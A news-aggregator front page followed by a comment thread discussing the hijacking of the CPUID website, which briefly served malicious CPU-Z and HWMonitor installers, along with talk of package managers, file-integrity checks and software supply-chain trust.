frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

You can't trust macOS Privacy and Security settings

https://eclecticlight.co/2026/04/10/why-you-cant-trust-privacy-security/
214•zdw•2h ago•84 comments

WireGuard makes new Windows release following Microsoft signing resolution

https://lists.zx2c4.com/pipermail/wireguard/2026-April/009561.html
155•zx2c4•2h ago•61 comments

1D Chess

https://rowan441.github.io/1dchess/chess.html
188•burnt-resistor•2h ago•32 comments

Industrial design files for Keychron keyboards and mice

https://github.com/Keychron/Keychron-Keyboards-Hardware-Design
90•stingraycharles•1h ago•18 comments

Helium Is Hard to Replace

https://www.construction-physics.com/p/helium-is-hard-to-replace
99•JumpCrisscross•2h ago•54 comments

Bluesky April 2026 Outage Post-Mortem

https://pckt.blog/b/jcalabro/april-2026-outage-post-mortem-219ebg2
56•jcalabro•2h ago•7 comments

CPU-Z and HWMonitor compromised

https://www.theregister.com/2026/04/10/cpuid_site_hijacked/
96•pashadee•4h ago•53 comments

Bild AI (YC W25) Is Hiring a Founding Product Engineer

https://www.ycombinator.com/companies/bild-ai/jobs/dDMaxVN-founding-product-engineer
1•rooppal•54m ago

Clojure on Fennel Part One: Persistent Data Structures

https://andreyor.st/posts/2026-04-07-clojure-on-fennel-part-one-persistent-data-structures/
58•roxolotl•3d ago•1 comments

Mysteries of Dropbox: Testing of a Distributed Sync Service (2016) [pdf]

https://www.cis.upenn.edu/~bcpierce/papers/mysteriesofdropbox.pdf
84•JackeJR•3d ago•19 comments

The difficulty of making sure your website is broken

https://letsencrypt.org/2026/04/10/test-sites.html
10•mcpherrinm•1h ago•3 comments

A compelling title that is cryptic enough to get you to take action on it

https://ericwbailey.website/published/a-compelling-title-that-is-cryptic-enough-to-get-you-to-tak...
10•mooreds•1h ago•6 comments

FBI used iPhone notification data to retrieve deleted Signal messages

https://9to5mac.com/2026/04/09/fbi-used-iphone-notification-data-to-retrieve-deleted-signal-messa...
432•01-_-•6h ago•217 comments

How NASA built Artemis II’s fault-tolerant computer

https://cacm.acm.org/news/how-nasa-built-artemis-iis-fault-tolerant-computer/
559•speckx•1d ago•213 comments

I still prefer MCP over skills

https://david.coffee/i-still-prefer-mcp-over-skills/
388•gmays•15h ago•321 comments

France to ditch Windows for Linux to reduce reliance on US tech

https://techcrunch.com/2026/04/10/france-to-ditch-windows-for-linux-to-reduce-reliance-on-us-tech/
249•Teever•2h ago•104 comments

RSoC 2026: A new CPU scheduler for Redox OS

https://www.redox-os.org/news/rsoc-dwrr/
19•akyuu•2d ago•3 comments

C++: Freestanding Standard Library

https://www.sandordargo.com/blog/2026/04/08/cpp-freestanding
25•ingve•2d ago•4 comments

Penguin 'Toxicologists' Find PFAS Chemicals in Remote Patagonia

https://www.ucdavis.edu/health/news/penguin-toxicologists-find-pfas-chemicals-remote-patagonia
114•giuliomagnifico•11h ago•46 comments

A new trick brings stability to quantum operations

https://ethz.ch/en/news-and-events/eth-news/news/2026/04/a-new-trick-brings-stability-to-quantum-...
208•joko42•13h ago•47 comments

Native Instant Space Switching on macOS

https://arhan.sh/blog/native-instant-space-switching-on-macos/
602•PaulHoule•22h ago•289 comments

Deterministic Primality Testing for Limited Bit Width

https://www.jeremykun.com/2026/04/07/deterministic-miller-rabin/
18•ibobev•2d ago•2 comments

Supply chain nightmare: How Rust will be attacked and what we can do to mitigate

https://kerkour.com/rust-supply-chain-nightmare
70•fanf2•3h ago•40 comments

Code is run more than read (2023)

https://olano.dev/blog/code-is-run-more-than-read/
95•facundo_olano•3h ago•66 comments

We've raised $17M to build what comes after Git

https://blog.gitbutler.com/series-a
273•ellieh•16h ago•589 comments

DRAM has a design flaw from 1966. I bypassed it [video]

https://www.youtube.com/watch?v=KKbgulTp3FE
358•surprisetalk•2d ago•127 comments

US summons bank bosses over cyber risks from Anthropic's latest AI model

https://www.theguardian.com/technology/2026/apr/10/us-summoned-bank-bosses-to-discuss-cyber-risks...
82•ascold•4h ago•54 comments

Generative art over the years

https://blog.veitheller.de/Generative_art_over_the_years.html
215•evakhoury•3d ago•58 comments

Why I'm Building a Database Engine in C#

https://nockawa.github.io/blog/why-building-database-engine-in-csharp/
28•vyrotek•1h ago•6 comments

Charcuterie – Visual similarity Unicode explorer

https://charcuterie.elastiq.ch/
297•rickcarlino•21h ago•68 comments
Open in hackernews

CPU-Z and HWMonitor compromised

https://www.theregister.com/2026/04/10/cpuid_site_hijacked/
96•pashadee•4h ago
https://xcancel.com/vxunderground/status/2042483067655262461

https://old.reddit.com/r/pcmasterrace/comments/1sh4e5l/warni...

https://www.bleepingcomputer.com/news/security/supply-chain-...

Comments

kevincloudsec•3h ago
same threat group hit filezilla last month. they're specifically targeting utilities that tech-savvy users trust and download from official sources. the attack surface is the the api layer that generates download links, not the binary itself
kevincloudsec•3h ago
same threat group hit filezilla last month with a fake domain. this time they didn't even need a fake domain, they compromised the real one's api layer. the attack is evolving from 'trick users into visiting the wrong site' to 'make the right site serve the wrong file.'
cachius•3h ago
This is bad. I like to install software with winget. Are the versions there also compromised?

v1.63 updated 6 days ago https://github.com/microsoft/winget-pkgs/tree/master/manifes... via https://winstall.app/apps/CPUID.HWMonitor

v2.19 updated 15 days ago https://github.com/microsoft/winget-pkgs/tree/master/manifes... via https://winstall.app/apps/CPUID.CPU-Z

cachius•2h ago
It's HWMonitor https://www.cpuid.com/softwares/hwmonitor.html and not HWInfo https://www.hwinfo.com/

So two programs from CPUID. I wonder if there are more affected.

Same topic on Reddit at https://news.ycombinator.com/item?id=47718830 @dang

wang_li•2h ago
Jesus. I see that post and comment section and I immediately expect to hear Joey telling me about how this ATM is Idaho started spraying cash after his hack of the Gibson. That is a real-life reproduction of the perception of hackers in films in the '90s.
metalliqaz•2h ago
someone has some l33t sk1llz
vntok•2h ago
From the thread:

> Q: Why the heck did you hyperlink [the malware installer]?

> A: If someone reads this and they still click the download then they kind of deserve the virus tbh

daneel_w•3m ago
And CSI: Miami, which kept the vibe alive through the 2000s and "educated the masses" on how IT works. Beep boop, I'm in.
orthogonal_cube•2h ago
Seems the installers hosted by them are fine. The links on the site have been changed to direct people towards Cloudflare R2 storage with various copies of malicious executables.

Looking forward to information down the line on how this came about.

1970-01-01•1h ago
Not exactly a supply chain compromise, as devs should be smart enough to update via a package manager such as winget and chocolatey, but it certainly fits for a watering hole attack.
Terr_•26m ago
I suppose one could view it as a supply-chain compromise of an alternate chain that's very short.
john_strinlai•2h ago
some comments purportedly (i did not verify) from one of the maintainers:

>Dear All, I'm Sam and in I'm working with Franck on CPU-Z (I'm doing the validator). Franck is unfortunately OOO for a couple weeks. I'm just out of bed after worked on Memtest86+ for most the night, so I'm doing my best to check everything. As very first checks, the file on our server looks fine (https://www.virustotal.com/gui/file/6c8faba4768754c3364e7c40...) and the server doesn't seems compromised. I'm investigating further... If anyone can tell me the exact link to the page where the malware was downloaded, that would help a lot

>Thank you. I found the biggest breach, restored the links and put everything in read-only until more investigation is done. Seems they waited Franck was off and I get to bad after working on Memtest86+ yesterday :-/

>The links have been compromised for a bit more than 6 hours between 09/04 and 10/04 GMT :-/

so, it appears that the cpuid website was compromised, with links leading to fake installers.

BoredPositron•2h ago
It's the third time that I've read something about availability notifications on discord and other chats getting abused for timed attacks in the last few weeks.
magicalhippo•1h ago
After my Wordpress site got hacked way back through an exploit in one of the WP files, I set up a cron job that compared the hash of the static files with expected hash, and would fire off an email if they differed.

The script lived above the web root, so they'd have to escape that to tamper with it, and was generated by another script.

Saved me a couple of times since, well worth the 15 minutes I spent on setting it up.

embedding-shape•1h ago
> Saved me a couple of times since

Wait, how often does your Wordpress site get successfully hacked like that?

magicalhippo•1h ago
Keep in mind the first time was about 20 years ago.

One time the hosting provider got compromised, FTP server exploit IIRC, they ran a recursive search and replace from root directory of the server.

michaelt•31m ago
Back in the 1990s, there was a tool called ‘tripwire’ that checked key files against expected checksums.

As I recall, they recommended putting the expected values on a floppy disk and setting the ‘write protect’ tab, so the checksums couldn’t be changed.

Terr_•27m ago
Back in the 90s I fantasized about a hard drive bay with a physical write-protect switch on the cover plate.
FuriouslyAdrift•12m ago
tripwire was the orginal file integrity anti-virus/anti-tampering software from the security group (which turned into CERIAS) at Purdue led by Dr. Eugene "Spaff" Spafford.

https://docs.lib.purdue.edu/cstech/1084/

daneel_w•6m ago
Related: OpenBSD does this daily as part of running security(8) and its coverage can be expanded to include pretty much anything.

https://man.openbsd.org/security

cwizou•11m ago
For what it's worth - I used to write CPU reviews a while back - I can vouch for both Sam and Franck. Franck is the guy behind CPUID and Sam is a close friend of his, who was known for working at Canard PC on top of his work on Memtest : https://x86.fr/about-me/
john_strinlai•5m ago
that is pretty cool!

when i say i didnt verify, i just mean that i ripped these quotes out of reddit, and did not check whether the reddit username that posted the comments is known to be an identity of Sam.

amatecha•2h ago
some good details here https://xcancel.com/vxunderground/status/2042483067655262461
kyrra•2h ago
For windows users, this is an advantage of using `winget` for installing things. It points to the installer hosted elsewhere, but it at least does a signature check. The config for the latest installer is listed here: https://github.com/microsoft/winget-pkgs/blob/master/manifes...

which you can install with:

   winget install --exact --id CPUID.CPU-Z
(there is a --version flag where you can specify "2.19", which the signature there is a month old, so it should be safe to install that way)
ww520•2h ago
Yes. Winget is getting better support on Windows apps. The other day I tried to download the latest version of ImageMagick but all the links on the official site were bad. I tried Winget and it had it!
eviks•2h ago
This manifest only shows sha checks, which wouldn't help if the manifest is updated during the site compromise. How does it do the signature check?
actionfromafar•1h ago
Presumably the manifest is in github and won't auto-update when something on the CPU-Z website changes?
eviks•1h ago
What do you mean, how would it get the new version name/hash if not following the changes on the website?
kyrra•1h ago
I think you should spend the 5 minutes it takes to look at the winget-pkg repo to see how it works. There's lots of great documentation.

All updates are manual, and are done via pull requests. Check everything in-queue: https://github.com/microsoft/winget-pkgs/pulls

Existing versions don't tend to have their metadata updated (I'm not sure winget would accept it). Only new versions are supported.

You can see all the checks that go into cpu-z updates with the latest PR: https://github.com/microsoft/winget-pkgs/pull/349095

eviks•57m ago
That would obviously be longer than 5 minutes; presumably you've done that and still can't answer the simple question

> All updates are manual, and are done via pull requests.

The pull requests can be and some are automated, so not all are manual. But more importantly, how would it help?

> Existing versions don't tend to have their metadata updated (I'm not sure winget would accept it). Only new versions are supported.

The attack is version update! How is the old manifest version relevant here?

> You can see all the checks that go into cpu-z updates with the latest PR:

> Description : Invoke an Azure Function > Static Analysis > Status: Started > Status: InProgress

Excellent, now how can I get the answer to the question from this valuable information?

hypeatei•1h ago
Package managers also saved people from the Notepad++ hijack that was disclosed a couple months ago.

I think devs should avoid distributing their software on first party sites unless they're willing to dedicate a bunch of time to making sure all the infra is secure. Not a lot of people verify signatures, but it's also good to have your PKI in order (signing keys should be available on multiple channels)

fuzzy2•1h ago
No, WinGet does not generally protect against this. While PRs to update package versions are verified in some way before going live, the necessary throughput can only be achieved with shallow checks. A determined actor could easily get a malicious update in, once they control the original source.

Other than that, WinGet is mostly just "run setup.exe". It is not a package manager. It's basically MajorGeeks as a mediocre CLI.

quantummagic•2h ago
> after the download my Windows Defender instantly detecting a virus.

> (because i am often working with programms which triggering the defender i just ignored that)

This again shows the unfortunate corrosive effect of false-positives. Probably impossible to solve while aggressively detecting viruses though.

pshirshov•1h ago
But sorta possible to solve with source-based distribution and totally possible to solve with pure reproducible builds.
daveguy•1h ago
What systems have pure reproducible builds? Does Nix? Any others? From what I understand, it is a very difficult problem.
pshirshov•1h ago
https://stal-ix.github.io/ and Guix, but the definitions of purity are different for them.

Yes, a very difficult problem, compilers must be pure functions with thin effectful wrappers.

gertop•23m ago
It's entirely possible to ship malware in source form... Just look at the numerous supply chain attacks. Nix is a cute project but entirely irrelevant here.
eviks•1h ago
If only there were a great Windows app store or a package manager to help with the impossible...
unethical_ban•2h ago
I've wondered about this while using CachyOS and their package installer. I don't know what repos do what, I don't really understand the security model of the AUR, and I wonder, if I download a package, how can I know it's legitimate or otherwise by some trusted user of the community vs. some random person?
cephi•2h ago
To provide some quick information (I implore others to correct me here):

- CachyOS packages should be coming from known, trusted CachyOS and Arch Linux maintainers. There is still potential for them or their original packages to get compromised (See XZ backdoor) however they are pulling source code from trusted sources so you can generally trust these as much as your trust the OS itself.

- AUR packages are a complete wild west. AUR packages are defined by PKGBUILD files and I highly recommend learning how to read PKGBUILDs and always reading them before installation and re-reading them when they are updated. PKGBUILDs for AUR packages can be treated as untrusted shell scripts and to a certain extent an arbitrary actor can make and upload any PKGBUILD to the AUR. Feel free to use them, but make sure A) they are downloading from trusted sources like the original git repo and B) they are running commands that are expected.

EDIT: Improved accuracy.

cachius•2h ago
Grok post linking further sources: https://x.com/i/grok/share/3b870ceb9b424c01bf89afbe0de3bd81
jl6•2h ago
To our new generation of human shields willing to use software releases less than a month old, we salute your sacrifice.
mikestorrent•1h ago
Is there a tool out there that you can put software releases into and it will tell you how safe it is? I don't seem to be able to buy anything to do this. Crowdstrike and other modern antivirus may react to it once it's on a device, SAST / SCA tooling will help with CVEs, but there's nothing I can give my users where they can put in some piece of random software and get a reputation metric out the other side, is there?
Foobar8568•1h ago
Beside Virus Total, I am unsure https://www.virustotal.com/
mikestorrent•49m ago
Thanks, that's helpful
__natty__•1h ago
Not exactly for software (although there is such section) but I use end of life [0] website. Besides time when certain software will be outdated it also tells you their release time.

[0] https://endoflife.date/

seanw444•54m ago
You could put it into an LLM, since that's what we do for everything else nowadays.
vladvasiliu•38m ago
> put in some piece of random software and get a reputation metric out the other side

Well, the enterprise version of ms defender will not only react to it if it does something "weird", but will specifically look at its "reputation" before it runs at all.

However, as another commenter pointed out, this generates a ton of false positives. Basically everything that's "brand new" is liable to trigger it. Think your freshly compiled hellow_world.exe. So, all in all, people may no longer pay attention to it and just click through all warnings.

sourcegrift•1h ago
Thanks the web that produced css programmers who have been taught latest is greatest and shiny gets money.
leptons•12m ago
"new, shiny" has never been a problem with CSS. Either browsers support some CSS attribute or they don't.

You're probably thinking about Javascript programmers.

layer8•18m ago
I’m not one to chase the new and shiny, but how do you know a nominally months-old software package isn’t a newly compromised version at the time you download it?
leptons•6m ago
I hope you don't think that waiting a month will protect you. Malicious software can wait to be triggered months or years before anything malicious happens.
BoredPositron•1h ago
"Bug fixes and general improvements."

Supply chain attacks are easier because changelogs for most software are useless now if they are provided at all.